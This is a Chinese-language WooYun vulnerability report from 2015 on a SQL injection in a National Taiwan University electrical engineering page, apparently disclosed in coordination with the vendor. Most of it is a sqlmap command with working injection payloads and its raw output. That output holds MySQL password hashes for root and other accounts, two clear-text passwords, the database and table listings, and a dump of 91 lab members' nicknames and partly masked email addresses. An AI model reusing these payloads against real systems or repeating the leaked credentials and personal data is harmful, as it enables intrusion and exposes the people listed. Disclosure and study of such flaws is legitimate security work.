当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149922

漏洞标题:国立台湾大学电机工程学系某处存在sql注入漏洞(DBA权限/root密码泄露/35个库/大量用户信息泄露)(臺灣地區)

相关厂商:国立台湾大学

漏洞作者: 路人甲

提交时间:2015-10-28 10:46

修复时间:2015-12-12 20:12

公开时间:2015-12-12 20:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

国立台湾大学电机工程学系某处存在sql注入漏洞(DBA权限/root密码泄露/35个库/大量用户信息泄露)

详细说明:

测试地址:http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation

python sqlmap.py -u "http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation" -p table_name --technique=BEU --random-agent --batch -D nslab -T member -C id,nickname,email --dump

漏洞证明:

---
Parameter: table_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
current user: 'nslab@localhost'
current user is DBA: True
database management system users [34]:
[*] 'bltemp'@'%'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'localhost'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp'@'**.**.**.**'
[*] 'bltemp1'@'**.**.**.**'
[*] 'cmchen'@'%'
[*] 'cmchen_blog'@'localhost'
[*] 'golo'@'%'
[*] 'huangty'@'%'
[*] 'huangty'@'localhost'
[*] 'mllu'@'%'
[*] 'mrbs'@'%'
[*] 'nslab'@'%'
[*] 'nslab'@'**.**.**.**'
[*] 'nslab'@'localhost'
[*] 'nslab'@'**.**.**.**'
[*] 'nslab'@'**.**.**.**'
[*] 'pp2011'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'SIGCOMM2012TG'@'**.**.**.**'
[*] 'SIGCOMM2012TG'@'localhost'
[*] 'SIGCOMM2012TG'@'localhost.localdomain'
[*] 'SIGCOMM2012TG'@'**.**.**.**'
[*] 'SIGCOMM2012TG'@'**.**.**.**'
[*] 'SIGCOMM2013TG'@'**.**.**.**'
[*] 'SIGCOMM2013TG'@'localhost'
[*] 'SIGCOMM2013TG'@'localhost.localdomain'
[*] 'YuShanNet'@'%'
database management system users password hashes:
[*] bltemp [1]:
password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
[*] bltemp1 [1]:
password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
[*] cmchen [1]:
password hash: *1DDF4D6AA65CCED4FB1660037450BDF6AA7F5FE6
[*] cmchen_blog [1]:
password hash: *3E93B93CDABCB5FC8CA9C771FA08173B204C9E95
[*] golo [1]:
password hash: *B75EC3115810159A249E1B0D5269CC618ECB39B2
[*] huangty [1]:
password hash: *853BC447D8603E6A7F834BEA8358270429942DB1
[*] mllu [1]:
password hash: *7882622239ED80F6E6AA6A7D941886BFB547CA51
[*] mrbs [1]:
password hash: *853BC447D8603E6A7F834BEA8358270429942DB1
[*] nslab [2]:
password hash: *C65421FCAD27D82431A17FDCD19D933BFE398FA1
password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
[*] pp2011 [1]:
password hash: *D51F49DDA0D183B925A65C6153FE963954FFC4C8
[*] root [1]:
password hash: *BE7F69DBAD4D0F984CD4AA240408143837507D09
[*] SIGCOMM2012TG [1]:
password hash: *82DE7C0C710D898C4F5FF91FA279C6E2E7FDCE5B
clear-text password: SIGCOMM2012TG
[*] SIGCOMM2013TG [1]:
password hash: *D979C0C9811A6144A3F42BF1AD9F6166697A38C7
clear-text password: SIGCOMM2013TG
[*] YuShanNet [1]:
password hash: *CD7AEBC023809DFACC782F3C302B004E14200CFC
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
available databases [35]:
[*] articles
[*] biosensor
[*] biosensor_publication
[*] bltemp
[*] calendar
[*] cmchen
[*] cmchen_account
[*] cmchen_blog
[*] deaf
[*] huangty
[*] information_schema
[*] iSpace
[*] jane
[*] jinzora
[*] magnetic
[*] MHCI
[*] mllu
[*] MPP_GUIBoys
[*] mrbs
[*] mysql
[*] news
[*] nslab
[*] nslabboard
[*] papers
[*] performance_schema
[*] pp2011
[*] publication
[*] resource
[*] scholarship
[*] SIGCOMM2012TG
[*] SIGCOMM2013TG
[*] Skyqe
[*] test
[*] wordpress
[*] YuShanNet
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
[44 tables]
+----------------------------+
| BLelevator |
| 2004_Fall_LabFunTime |
| 2005_Fall_LabFunTime |
| 2005_Summer_LabFunTime |
| 2005_Summer_NetworkSeminar |
| 2006_Fall_LabFunTime |
| 2006_Fall_NetworkSeminar |
| 2006_Fall_OESeminar |
| 2006_Spring_LabFunTime |
| 2006_Spring_NetworkSeminar |
| 2007_Fall_LabFunTime |
| 2007_Fall_NetworkSeminar |
| 2007_Spring_LabFunTime |
| 2007_Spring_NetworkSeminar |
| 2007_Spring_OESeminar |
| 2008_Fall_LabFunTime |
| 2008_Fall_NetworkSeminar |
| 2008_Spring_LabFunTime |
| 2008_Spring_NetworkSeminar |
| 2009_Fall_LabFunTime |
| 2009_Fall_NetworkSeminar |
| 2009_Spring_LabFunTime |
| 2009_Spring_NetworkSeminar |
| 2010_Fall_LabFunTime |
| 2010_Fall_NetworkSeminar |
| 2010_Spring_LabFunTime |
| 2010_Spring_NetworkSeminar |
| 2011_Fall_LabFunTime |
| 2011_Fall_NetworkSeminar |
| 2011_Spring_LabFunTime |
| 2011_Spring_NetworkSeminar |
| 2012_Fall_LabFunTime |
| 2012_Fall_NetworkSeminar |
| 2012_Spring_LabFunTime |
| 2012_Spring_NetworkSeminar |
| 2013_Spring_LabFunTime |
| 2013_Spring_NetworkSeminar |
| announcement |
| member |
| property |
| property2 |
| property_log |
| publication |
| test |
+----------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
Table: member
[12 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| affiliation | varchar(100) |
| Chinese | varchar(64) |
| degree | varchar(30) |
| email | varchar(32) |
| English | varchar(16) |
| gradyear | varchar(30) |
| id | int(11) |
| location | char(1) |
| nickname | varchar(16) |
| showup | char(1) |
| type | varchar(16) |
| url | varchar(100) |
+-------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
Table: property_log
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| holder | varchar(100) |
| id | int(11) |
| logDate | text |
| objCode | text |
| object | text |
| pre_holder | varchar(100) |
+------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: table_name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: pattern=0&table_name=congratulation WHERE 8702=8702 AND 4513=4513#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: pattern=0&table_name=congratulation WHERE 9146=9146 AND (SELECT 1680 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(1680=1680,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: pattern=0&table_name=congratulation WHERE 7405=7405 UNION ALL SELECT NULL,CONCAT(0x71707a7071,0x784c4c53716861764a4768615473477a764c65445967546e4a44646d626e6b446e776b4b57506e6e,0x7171717671),NULL,NULL,NULL,NULL#
---
web server operating system: FreeBSD
web application technology: Apache 2.2.22, PHP 5.3.14
back-end DBMS: MySQL 5.0
Database: nslab
Table: member
[91 entries]
+----+-------------+---------------------------------+
| id | nickname | email |
+----+-------------+---------------------------------+
| 1 | Polly | pollyhuang at **.**.**.** |
| 2 | Abon | r94921033 at **.**.**.** |
| 3 | Ahey | b91901152 at **.**.**.** |
| 4 | Cheng-Ying | Cheng-Ying.png |
| 5 | Chih-Ying | za950112 at **.**.**.** |
| 6 | David | r92921091 at **.**.**.** |
| 7 | Elaine | elaine.png |
| 8 | Han | b90901046 at **.**.**.** |
| 9 | Ivan | r94921042 at **.**.**.** |
| 41 | Jeffrey | d94921013 at **.**.**.** |
| 79 | Kun-chan | klan at csie ncku edu tw |
| 11 | Jerry | r93922115 at **.**.**.** |
| 12 | Marc | r94921030 at **.**.**.** |
| 13 | Matthew | r93921029 at **.**.**.** |
| 14 | Ming-Tsang | r93064 at csie.**.**.**.** |
| 15 | Monpig | monmonpig at **.**.**.** |
| 16 | Stephan | r92921106 at **.**.**.** |
| 17 | Steve | b89117 at csie.**.**.**.** |
| 18 | Steven | r93921100 at **.**.**.** |
| 19 | S.Y. | sylau at **.**.**.** |
| 20 | Tim | r93921093 at **.**.**.** |
| 21 | Tylor | r93921046 at **.**.**.** |
| 22 | Yu-Chi | b92901063 at **.**.**.** |
| 23 | James | b89901097 at **.**.**.** |
| 24 | Nelson | chuncn at cpsc.ucalgary.ca |
| 25 | Jimmy | cmchen.png |
| 26 | Te-Yuan | huangty.png |
| 28 | Sheng-Wei | swc at **.**.**.** |
| 32 | Ling-Jyh | cclljj at **.**.**.** |
| 29 | Patrick | b91901044 at **.**.**.** |
| 30 | Ben | b92901139 at **.**.**.** |
| 31 | Junction | b92901134 at **.**.**.** |
| 27 | Hao | hchu at csie.**.**.**.** |
| 34 | Ming-Tsang | r93064 at csie.**.**.**.** |
| 35 | Jerry | r93922115 at **.**.**.** |
| 36 | Steve | r96942034 at **.**.**.** |
| 37 | Justin | j.huang.1985 at **.**.**.** |
| 38 | Eugene | eugene7505 at **.**.**.** |
| 39 | K.M. | olddu at **.**.**.** |
| 40 | Mike | michael.eckl at **.**.**.** |
| 42 | Vincent | r97921035 at **.**.**.** |
| 43 | Pang-Yen | eisscholle at **.**.**.** |
| 44 | Yung-Chieh | b94901126 at **.**.**.** |
| 45 | Hsu-Chieh | <blank> |
| 46 | Yi-En | <blank> |
| 47 | Ian | <blank> |
| 48 | Lawrence | powerstar1009 at **.**.**.** |
| 49 | Steven | stevensyy at **.**.**.** |
| 50 | Susan | s8800266 at **.**.**.** |
| 51 | David | david213-redmond at **.**.**.** |
| 52 | Andrea | stupidandrea at **.**.**.** |
| 53 | Jason | JASON8877 at MSN.COM |
| 54 | James | jameslee2007tw at **.**.**.** |
| 55 | Nicky | b95901189 at **.**.**.** |
| 56 | Helen | featherchao33 at **.**.**.** |
| 57 | Brian | boyan152 at **.**.**.** |
| 58 | Omni | potence at **.**.**.** |
| 59 | Piggy | r99921035 at **.**.**.** |
| 60 | Annie | anniechiu92 at **.**.**.** |
| 61 | Lisa | lisahsu24 at **.**.**.** |
| 62 | Emily | emily750120 at **.**.**.** |
| 63 | ColdCatCola | b94901148 at **.**.**.** |
| 64 | Yetta | ja7656 at **.**.**.** |
| 65 | Louwang | samuelwang22 at **.**.**.** |
| 66 | Sean | r98921040 at **.**.**.** |
| 67 | Jason | jason5tw2001 at **.**.**.** |
| 68 | Junction | b92901134 at **.**.**.** |
| 69 | Justin | j.huang.1985 at **.**.**.** |
| 71 | Sowhat | sowhat.1055 at **.**.**.** |
| 75 | Chloe | existence124315 at **.**.**.** |
| 74 | Nancy | nliao0112 at **.**.**.** |
| 76 | Jiang-Jiang | jiangjiau at **.**.**.** |
| 77 | Tina | rabbiturtle9 at **.**.**.** |
| 78 | CT | iwchiao at **.**.**.** |
| 80 | Johnsen | jk05r at ecs.soton.ac.uk |
| 81 | XiaoHong | kingsmallred at **.**.**.** |
| 82 | Archiang | borchiang at **.**.**.** |
| 83 | Twohsien | mich5782 at **.**.**.** |
| 84 | Kcir | b94902067 at **.**.**.** |
| 85 | Yuting | b95202002 at **.**.**.** |
| 86 | MengLin | r00921037 at **.**.**.** |
| 87 | Vishwesh | vvk215 at **.**.**.** |
| 88 | TsungYun | dj184dja8 at **.**.**.** |
| 90 | YangChun | tukishimaaoba at gmail com |
| 91 | ChiaChih | a101112141 at **.**.**.** |
| 92 | Piggy | r99921035 at **.**.**.** |
| 93 | SY | sylau at **.**.**.** |
| 94 | Ted | tedlai at csie.**.**.**.** |
| 95 | Ronald | ronaldvongola at **.**.**.** |
| 96 | Jane | b99901079@**.**.**.** |
| 97 | Chi-Yun Wu | b99901138 at **.**.**.** |
+----+-------------+---------------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-28 20:11

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价